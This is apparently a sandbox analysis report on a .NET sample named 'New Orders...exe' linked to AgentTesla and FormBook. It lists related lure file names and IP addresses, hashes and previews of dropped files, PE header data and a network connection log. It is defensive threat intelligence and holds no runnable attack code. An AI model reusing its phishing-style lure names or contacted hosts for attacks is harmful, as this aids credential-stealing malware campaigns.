                                                                    ADSFDGHJs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                                                                    • 212.110.188.207
                                                                    OUTSTANDING PO.exeGet hashmaliciousFormBookBrowse
                                                                    • 212.110.188.207
                                                                    ENQUIRY FOR QUOTATION.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 212.110.188.207
                                                                    PAYMENT.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 212.110.188.207
                                                                    Urgent request for a quote.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 212.110.188.207
                                                                    Your file name without extension goes here.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 212.110.188.207
                                                                    PO23656PDFF.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 212.110.188.207
                                                                    OVDC-ASUAPayment Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 93.171.243.253
                                                                    DHL DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 93.171.243.253
                                                                    https://waltondev2.com/c.phpGet hashmaliciousPhisherBrowse
                                                                    • 93.171.243.253
                                                                    SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 93.171.243.253
                                                                    PO #1131011152-2024-Order,pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 93.171.243.253
                                                                    SecuriteInfo.com.Win64.ExploitX-gen.17969.12173.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 93.171.243.253
                                                                    FEDEX & INVOICE.Tracking Details.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 93.171.243.253
                                                                    MIDCO-NETUSPayment Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 24.230.33.96
                                                                    RFQ__ PO-7647454645_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 24.230.33.96
                                                                    copia TT allegata.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 24.230.33.96
                                                                    ADSFDGHJs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                                                                    • 24.230.33.96
                                                                    OUTSTANDING PO.exeGet hashmaliciousFormBookBrowse
                                                                    • 24.230.33.96
                                                                    ENQUIRY FOR QUOTATION.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 24.230.33.96
                                                                    PAYMENT.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 24.230.33.96
                                                                    Urgent request for a quote.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 24.230.33.96
                                                                    Your file name without extension goes here.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 24.230.33.96
                                                                    PO23656PDFF.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 24.230.33.96
                                                                    LILLY-ASUSPayment Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 43.128.107.251
                                                                    RFQ__ PO-7647454645_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 43.128.107.251
                                                                    copia TT allegata.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 43.128.107.251
                                                                    ADSFDGHJs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                                                                    • 43.128.107.251
                                                                    OUTSTANDING PO.exeGet hashmaliciousFormBookBrowse
                                                                    • 43.128.107.251
                                                                    ENQUIRY FOR QUOTATION.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 43.128.107.251
                                                                    PAYMENT.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 43.128.107.251
                                                                    Urgent request for a quote.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 43.128.107.251
                                                                    Your file name without extension goes here.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 43.128.107.251
                                                                    PO23656PDFF.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 43.128.107.251
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    3b5074b1b5d032e5620f69f9f700ff0ePayment Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 172.67.140.87
                                                                    • 140.82.114.3
                                                                    • 222.255.238.159
                                                                    • 172.67.74.152
                                                                    qO7JURaOlaa6Jav.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                    • 172.67.140.87
                                                                    • 140.82.114.3
                                                                    • 222.255.238.159
                                                                    • 172.67.74.152
                                                                    ZoominstallerFull.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                                                    • 172.67.140.87
                                                                    • 140.82.114.3
                                                                    • 222.255.238.159
                                                                    • 172.67.74.152
                                                                    RFQ__ PO-7647454645_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 172.67.140.87
                                                                    • 140.82.114.3
                                                                    • 222.255.238.159
                                                                    • 172.67.74.152
                                                                    copia TT allegata.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 172.67.140.87
                                                                    • 140.82.114.3
                                                                    • 222.255.238.159
                                                                    • 172.67.74.152
                                                                    ADSFDGHJs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                                                                    • 172.67.140.87
                                                                    • 140.82.114.3
                                                                    • 222.255.238.159
                                                                    • 172.67.74.152
                                                                    Mquqdysqqv.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                    • 172.67.140.87
                                                                    • 140.82.114.3
                                                                    • 222.255.238.159
                                                                    • 172.67.74.152
                                                                    OUTSTANDING PO.exeGet hashmaliciousFormBookBrowse
                                                                    • 172.67.140.87
                                                                    • 140.82.114.3
                                                                    • 222.255.238.159
                                                                    • 172.67.74.152
                                                                    ENQUIRY FOR QUOTATION.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 172.67.140.87
                                                                    • 140.82.114.3
                                                                    • 222.255.238.159
                                                                    • 172.67.74.152
                                                                    Pago_PDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 172.67.140.87
                                                                    • 140.82.114.3
                                                                    • 222.255.238.159
                                                                    • 172.67.74.152
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exe#U00d6deme Onay#U0131 Kopyas#U0131.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                      r__demeOnay__Kopyas__.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                        odeme_kopyasi.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                          O7HM6KX2ce.exeGet hashmaliciousAgentTeslaBrowse
                                                                            CBD_USD_REFERENCE_3901828872899399391108390100110929111.exeGet hashmaliciousAgentTeslaBrowse
                                                                              passportscan.htaGet hashmaliciousXWorm, zgRATBrowse
                                                                                SecuriteInfo.com.Win32.TrojanX-gen.24405.26677.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  Products_require_0027838.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    15_).scr.exeGet hashmaliciousDarkTortilla, XWormBrowse
                                                                                      Invoicegpj.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                        Process:C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69211 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                        Category:dropped
                                                                                        Size (bytes):69211
                                                                                        Entropy (8bit):7.995787876711886
                                                                                        Encrypted:true
                                                                                        SSDEEP:1536:4vHkVfDISE//aDY0WAXTF+0daIpyFQaqPZkatNjgkFOE4/JZZWnEn6:4vHKfMSeKFXdBcmnXkksE40E6
                                                                                        MD5:753DF6889FD7410A2E9FE333DA83A429
                                                                                        SHA1:3C425F16E8267186061DD48AC1C77C122962456E
                                                                                        SHA-256:B42DC237E44CBC9A43400E7D3F9CBD406DBDEFD62BFE87328F8663897D69DF78
                                                                                        SHA-512:9D56F79410AD0CF852C74C3EF9454E7AE86E80BDD6FF67773994B48CCAC71142BCF5C90635DA6A056E1406E81E64674DB9584928E867C55B77B59E2851CF6444
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview:MSCF....[.......,...................I..................WR. .authroot.stl..L...5..CK..<Tk...p.k:.]...k..-.o.d.}.N.F....!.....$t)K."..DE.....v..gr...}?>.<.s..<...{.t..\F.e.F...8&.<..>...t8....`dqM4.y..t8..t..3..1.`\.:+.<].F...3.~.M.B...*..J....PR.+..UUUV.GY...8...._vl.....H}.s.Pq..r.<.0.lG.C..e(..oe........9..'8..m.......G8T......sR..&=.*J....s.U......#...).j...x.....gq.+.N:.Wj...V.t...(J.;^..Mr~e..}.q....q....eo..O.....@.B.S.....66.|!.(.........D!k..&.. /.....H~.....}.(..|.S..~8..A..(.#..w.*Y.....'.F...y&.8......f..49r..N...(zX.0;.....000.3c)Z.v.5N'.z...rNFw,E.NY..#ua.o.$..Y?.-.=....}d.*..]......x_<.W....ya.3.a..SQT.U..|!.pyCA..-h..Y..>n......^.U.....H...EY.\.......}.-(....h..=xiV.O.W@p.=.r.i..c...c....S.x.;..GWf...=.:.....S.c/..v..3.iG<.&..%...8..=}.....+.n\?0"A.Y%<......+..O. .9..#..>.....5.2.j.1<.Z.>v..j...wr.i.:....!...;.N[.q..z9j..l.R.&,....$.V...k.j..Tc..m..D!%....".Y.#V."w.|....L| ..p........w.=..ck...<........{s..w..};../.=...k....YH.
                                                                                        Process:C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):330
                                                                                        Entropy (8bit):3.128570787982141
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:kK5mEXTN+SkQlPlEGYRMY9z+4KlDA3RUe1HEbpo:LX8kPlE99SNxAhUe1HEVo
                                                                                        MD5:A8DF317BE3E7A91D4E94CBBAA2FAF932
                                                                                        SHA1:4661E15E9F374A6E4BBA41ADAB3FE678E6DEC6E5
                                                                                        SHA-256:DC159F435DD859F2C1E8B811A6FA14D59B5E0D963C68AA2C72B49FBA646AFE13
                                                                                        SHA-512:EB0AE8F4DE55C3DB47A854D1EBB30C4BAC55907D8625898C337F9564F197BA365AC6466820AAA8973573F0245B82963ECC28C839BB047408593CC31186B06D93
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:p...... .........g...s..(....................................................... .........;.i......(...........[...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".2.c.8.3.b.1.3.b.a.f.6.9.d.a.1.:.0."...
                                                                                        Process:C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exe
                                                                                        File Type:CSV text
                                                                                        Category:modified
                                                                                        Size (bytes):1089
                                                                                        Entropy (8bit):5.3331074454898735
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:ML9E4KlKNE4oK2nMK/KDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlIHoVnM6YHKh3oPtHo6hAHKzeR
                                                                                        MD5:E54FE55F93C5501D5C4737CCF0E6E48B
                                                                                        SHA1:BEF9C1A7166E3E8C2C7762C42F8FCBB753B63283
                                                                                        SHA-256:2434AE4C4C8436A64A4F3317638DF77C38CB7FFC226037ADE1DC6F6CD4745619
                                                                                        SHA-512:5422F02595B12ACFE23AF8C69ACF43B5529C700FC3FA5ADEDDBDFF36737C22D7AE23FCD4A39869DF6D02D7D708F951142983E60ED90EADFDCE5CC40B164AD19D
                                                                                        Malicious:false
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\48ee4ec9441351bbe4d9095c96b8ea01\System.Configuration.Install.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\Nati
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:modified
                                                                                        Size (bytes):42064
                                                                                        Entropy (8bit):6.19564898727408
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:qtpFVLK0MsihB9VKS7xdgl6KJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+RPZTg:GBMs2SqdSZ6Iq8BxTfqWR8h7ukP
                                                                                        MD5:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                        SHA1:F0209900FBF08D004B886A0B3BA33EA2B0BF9DA8
                                                                                        SHA-256:AC1A3F21FCC88F9CEE7BF51581EAFBA24CC76C924F0821DEB2AFDF1080DDF3D3
                                                                                        SHA-512:9AC94880684933BA3407CDC135ABC3047543436567AF14CD9269C4ADC5A6535DB7B867D6DE0D6238A21B94E69F9890DBB5739155871A624520623A7E56872159
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: #U00d6deme Onay#U0131 Kopyas#U0131.exe, Detection: malicious, Browse
                                                                                        • Filename: r__demeOnay__Kopyas__.exe, Detection: malicious, Browse
                                                                                        • Filename: odeme_kopyasi.exe, Detection: malicious, Browse
                                                                                        • Filename: O7HM6KX2ce.exe, Detection: malicious, Browse
                                                                                        • Filename: CBD_USD_REFERENCE_3901828872899399391108390100110929111.exe, Detection: malicious, Browse
                                                                                        • Filename: passportscan.hta, Detection: malicious, Browse
                                                                                        • Filename: SecuriteInfo.com.Win32.TrojanX-gen.24405.26677.exe, Detection: malicious, Browse
                                                                                        • Filename: Products_require_0027838.exe, Detection: malicious, Browse
                                                                                        • Filename: 15_).scr.exe, Detection: malicious, Browse
                                                                                        • Filename: Invoicegpj.exe, Detection: malicious, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,>.]..............0..T...........r... ........@.. ....................................`.................................4r..O....................b..PB...........p............................................... ............... ..H............text....R... ...T.................. ..`.rsrc................V..............@..@.reloc...............`..............@..B................hr......H........"..|J..........lm.......o......................................2~.....o....*.r...p(....*VrK..p(....s.........*..0..........(....(....o....o....(....o.... .....T(....o....(....o....o ...o!....4(....o....(....o....o ...o".....(....rm..ps#...o....($........(%....o&....ry..p......%.r...p.%.(.....(....('....((.......o)...('........*.*................"..(*...*..{Q...-...}Q.....(+...(....(,....(+...*"..(-...*..(....*..(.....r...p.(/...o0...s....}T...*....0.. .......~S...-.s
                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                        Category:dropped
                                                                                        Size (bytes):1835008
                                                                                        Entropy (8bit):4.394366409685599
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:bl4fiJoH0ncNXiUjt10qjG/gaocYGBoaUMMhA2NX4WABlBuNAXOBSqa:Z4vFjMYQUMM6VFYSXU
                                                                                        MD5:5E577589052FB16C7C919E77FC07CB4C
                                                                                        SHA1:CA13D3882857D7EE27D1ABF72A29C63B52094E35
                                                                                        SHA-256:01FFF718C746D9DFED1A74CC84788A2086E204CF9CA729D106915A1F146578BE
                                                                                        SHA-512:3C5826C1796B95BB9C48F6BA842DFFAA6B987C9B33BE31B73A4353D5615AA42B2B222310760911E54E33C6297C42F6E12AE1F87B998D7070430531793924E09F
                                                                                        Malicious:false
                                                                                        Preview:regfG...F....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..)&.s...............................................................................................................................................................................................................................................................................................................................................n?.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                        Category:dropped
                                                                                        Size (bytes):1728512
                                                                                        Entropy (8bit):4.57802223292793
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:el4fiJoH0ncNXiUjt10qjG/QaocYGBoaUMMhA2NX4WABlBuNAXOBSqa:e4vFjUYQUMM6VFYSXU
                                                                                        MD5:7AC1CEA3C72B76503DA4944CF8A38FC6
                                                                                        SHA1:88650DE22B047F50F43DB4364D59209BC7CB493F
                                                                                        SHA-256:2A3B9A40C32E72288AD5BA6CAFD2BB9B9A7B193617457EE12F83FF37ED54CFFC
                                                                                        SHA-512:F61381C1CECDEFA177BCB8425EB6D7BD8230F12234F0B74BC14984A8D9D03623F1D6347A0843EFB6DF6920C78E270579D89D14A61C238195F9CA092AB8CAECA7
                                                                                        Malicious:false
                                                                                        Preview:regfF...F....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..)&.s...............................................................................................................................................................................................................................................................................................................................................n?.HvLE.^......F....`......0...&#.......f.......0...@... ..hbin.................\.Z............nk,..\.Z........ ...........h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........F...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e. ./.s.i.l.e.n.t.......vk..<...............
                                                                                        Process:C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):2017
                                                                                        Entropy (8bit):4.659840607039457
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:zK4QsD4ql0+1AcJRy0EJP64gFljVlWo3ggxUnQK2qmBvgw1+5:zKgDEcTytNe3Wo3uQVBIe+5
                                                                                        MD5:3BF802DEB390033F9A89736CBA5BFAFF
                                                                                        SHA1:25A7177A92E0283B99C85538C4754A12AC8AD197
                                                                                        SHA-256:5202EB464D6118AC60F72E89FBAAACF1FB8CF6A232F98F47F88D0E7B2F3AFDB3
                                                                                        SHA-512:EB4F440D28ECD5834FD347F43D4828CA9FEE900FF003764DD1D18B95E0B84E414EAECF70D75236A1463366A189BC5CBA21613F79B5707BF7BDB3CEA312CCE4F7
                                                                                        Malicious:false
                                                                                        Preview:Microsoft (R) .NET Framework Installation utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....Usage: InstallUtil [/u | /uninstall] [option [...]] assembly [[option [...]] assembly] [...]]....InstallUtil executes the installers in each given assembly...If the /u or /uninstall switch is specified, it uninstalls..the assemblies, otherwise it installs them. Unlike other..options, /u applies to all assemblies, regardless of where it..appears on the command line.....Installation is done in a transactioned way: If one of the..assemblies fails to install, the installations of all other..assemblies are rolled back. Uninstall is not transactioned.....Options take the form /switch=[value]. Any option that occurs..before the name of an assembly will apply to that assembly's..installation. Options are cumulative but overridable - options..specified for one assembly will apply to the next as well unless..the option is specified with a new value. The default for
                                                                                        File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):6.252431058785244
                                                                                        TrID:
                                                                                        • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                                                        • Win64 Executable GUI (202006/5) 46.43%
                                                                                        • Win64 Executable (generic) (12005/4) 2.76%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.46%
                                                                                        • DOS Executable Generic (2002/1) 0.46%
                                                                                        File name:New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        File size:41'472 bytes
                                                                                        MD5:ab245cb90a4667db2c06cc8e0b1096b6
                                                                                        SHA1:b3898f3c522f5f84354afe5a36dc8646e60ecb99
                                                                                        SHA256:cb5363031da0d5e48844e4067435084eddc4d6eaae49ae13c612e5b48acb796f
                                                                                        SHA512:787641c90a7c99f083e8537d7f232ebfc0e0c5342d51973bcabdaad556f4832f91697a5daa1194fc41fd82ded42880379395a48256c183ba3db6a7f6d1c18cba
                                                                                        SSDEEP:768:ygwPoPaHsrMlXyiaZCM8Ihloegap2SPQ2RgedZL:HsVHsYlXyjZP8INgap02Rdp
                                                                                        TLSH:8F135A20B76C123BDAAF41F64C6000C03735E34277D2EBEA9DDA908656C37C53AB4E5A
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....X............"...0.................. ....@...... ....................................`................................
                                                                                        Icon Hash:00928e8e8686b000
                                                                                        Entrypoint:0x400000
                                                                                        Entrypoint Section:
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0xC398581B [Tue Dec 26 19:12:27 2073 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:
                                                                                        Instruction
                                                                                        dec ebp
                                                                                        pop edx
                                                                                        nop
                                                                                        add byte ptr [ebx], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax+eax], al
                                                                                        add byte ptr [eax], al
                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x5d6.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xb7500x38.text
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x20000x98100x9a004c3e9ddedcbef52d2aa082232b3a26beFalse0.591010551948052data6.3197482275780095IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0xc0000x5d60x600f1ee9f02a5cb6e37adf0d993ee3f387bFalse0.4186197916666667data4.124252649326652IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_VERSION0xc0a00x34cdata0.4099526066350711
                                                                                        RT_MANIFEST0xc3ec0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Mar 11, 2024 16:16:09.887082100 CET49677443192.168.2.920.189.173.11
                                                                                        Mar 11, 2024 16:16:10.194960117 CET49677443192.168.2.920.189.173.11
                                                                                        Mar 11, 2024 16:16:10.804570913 CET49673443192.168.2.9204.79.197.203
                                                                                        Mar 11, 2024 16:16:10.804574013 CET49677443192.168.2.920.189.173.11
                                                                                        Mar 11, 2024 16:16:11.882492065 CET49676443192.168.2.923.206.229.209
                                                                                        Mar 11, 2024 16:16:11.882514000 CET49675443192.168.2.923.206.229.209
                                                                                        Mar 11, 2024 16:16:12.007395029 CET49677443192.168.2.920.189.173.11
                                                                                        Mar 11, 2024 16:16:12.164288998 CET49674443192.168.2.923.206.229.209
                                                                                        Mar 11, 2024 16:16:14.413618088 CET49677443192.168.2.920.189.173.11
                                                                                        Mar 11, 2024 16:16:19.226149082 CET49677443192.168.2.920.189.173.11
                                                                                        Mar 11, 2024 16:16:20.413642883 CET49673443192.168.2.9204.79.197.203
                                                                                        Mar 11, 2024 16:16:21.491751909 CET49676443192.168.2.923.206.229.209
                                                                                        Mar 11, 2024 16:16:21.491841078 CET49675443192.168.2.923.206.229.209
                                                                                        Mar 11, 2024 16:16:21.773046970 CET49674443192.168.2.923.206.229.209
                                                                                        Mar 11, 2024 16:16:23.201114893 CET4434970423.206.229.209192.168.2.9
                                                                                        Mar 11, 2024 16:16:23.201241970 CET49704443192.168.2.923.206.229.209
                                                                                        Mar 11, 2024 16:16:28.835510969 CET49677443192.168.2.920.189.173.11
                                                                                        Mar 11, 2024 16:16:35.991561890 CET49714443192.168.2.9140.82.114.3
                                                                                        Mar 11, 2024 16:16:35.991604090 CET44349714140.82.114.3192.168.2.9
                                                                                        Mar 11, 2024 16:16:35.991677999 CET49714443192.168.2.9140.82.114.3
                                                                                        Mar 11, 2024 16:16:36.914679050 CET49714443192.168.2.9140.82.114.3
                                                                                        Mar 11, 2024 16:16:36.914712906 CET44349714140.82.114.3192.168.2.9
                                                                                        Mar 11, 2024 16:16:37.356667995 CET44349714140.82.114.3192.168.2.9
                                                                                        Mar 11, 2024 16:16:37.356806040 CET49714443192.168.2.9140.82.114.3
                                                                                        Mar 11, 2024 16:16:37.360359907 CET49714443192.168.2.9140.82.114.3
                                                                                        Mar 11, 2024 16:16:37.360397100 CET44349714140.82.114.3192.168.2.9
                                                                                        Mar 11, 2024 16:16:37.360733986 CET44349714140.82.114.3192.168.2.9
                                                                                        Mar 11, 2024 16:16:37.413698912 CET49714443192.168.2.9140.82.114.3
                                                                                        Mar 11, 2024 16:16:37.608392954 CET49714443192.168.2.9140.82.114.3
                                                                                        Mar 11, 2024 16:16:37.652245998 CET44349714140.82.114.3192.168.2.9
                                                                                        Mar 11, 2024 16:16:37.961823940 CET44349714140.82.114.3192.168.2.9
                                                                                        Mar 11, 2024 16:16:37.961988926 CET44349714140.82.114.3192.168.2.9
                                                                                        Mar 11, 2024 16:16:37.962073088 CET49714443192.168.2.9140.82.114.3
                                                                                        Mar 11, 2024 16:16:37.962105036 CET44349714140.82.114.3192.168.2.9
                                                                                        Mar 11, 2024 16:16:37.962151051 CET49714443192.168.2.9140.82.114.3
                                                                                        Mar 11, 2024 16:16:37.963232040 CET44349714140.82.114.3192.168.2.9
                                                                                        Mar 11, 2024 16:16:37.963278055 CET44349714140.82.114.3192.168.2.9
                                                                                        Mar 11, 2024 16:16:37.963313103 CET44349714140.82.114.3192.168.2.9
                                                                                        Mar 11, 2024 16:16:37.963330984 CET49714443192.168.2.9140.82.114.3
                                                                                        Mar 11, 2024 16:16:37.963359118 CET44349714140.82.114.3192.168.2.9
                                                                                        Mar 11, 2024 16:16:37.963383913 CET44349714140.82.114.3192.168.2.9
                                                                                        Mar 11, 2024 16:16:37.963406086 CET49714443192.168.2.9140.82.114.3
                                                                                        Mar 11, 2024 16:16:37.963413000 CET44349714140.82.114.3192.168.2.9
                                                                                        Mar 11, 2024 16:16:37.963443995 CET49714443192.168.2.9140.82.114.3
                                                                                        Mar 11, 2024 16:16:38.177613974 CET44349714140.82.114.3192.168.2.9
                                                                                        Mar 11, 2024 16:16:38.177670956 CET44349714140.82.114.3192.168.2.9
                                                                                        Mar 11, 2024 16:16:38.177700996 CET44349714140.82.114.3192.168.2.9
                                                                                        Mar 11, 2024 16:16:38.177731037 CET44349714140.82.114.3192.168.2.9
                                                                                        Mar 11, 2024 16:16:38.177731037 CET49714443192.168.2.9140.82.114.3
                                                                                        Mar 11, 2024 16:16:38.177778959 CET44349714140.82.114.3192.168.2.9
                                                                                        Mar 11, 2024 16:16:38.177807093 CET49714443192.168.2.9140.82.114.3
                                                                                        Mar 11, 2024 16:16:38.177822113 CET44349714140.82.114.3192.168.2.9
                                                                                        Mar 11, 2024 16:16:38.177866936 CET49714443192.168.2.9140.82.114.3
                                                                                        Mar 11, 2024 16:16:38.177879095 CET44349714140.82.114.3192.168.2.9
                                                                                        Mar 11, 2024 16:16:38.178806067 CET44349714140.82.114.3192.168.2.9
                                                                                        Mar 11, 2024 16:16:38.178831100 CET44349714140.82.114.3192.168.2.9
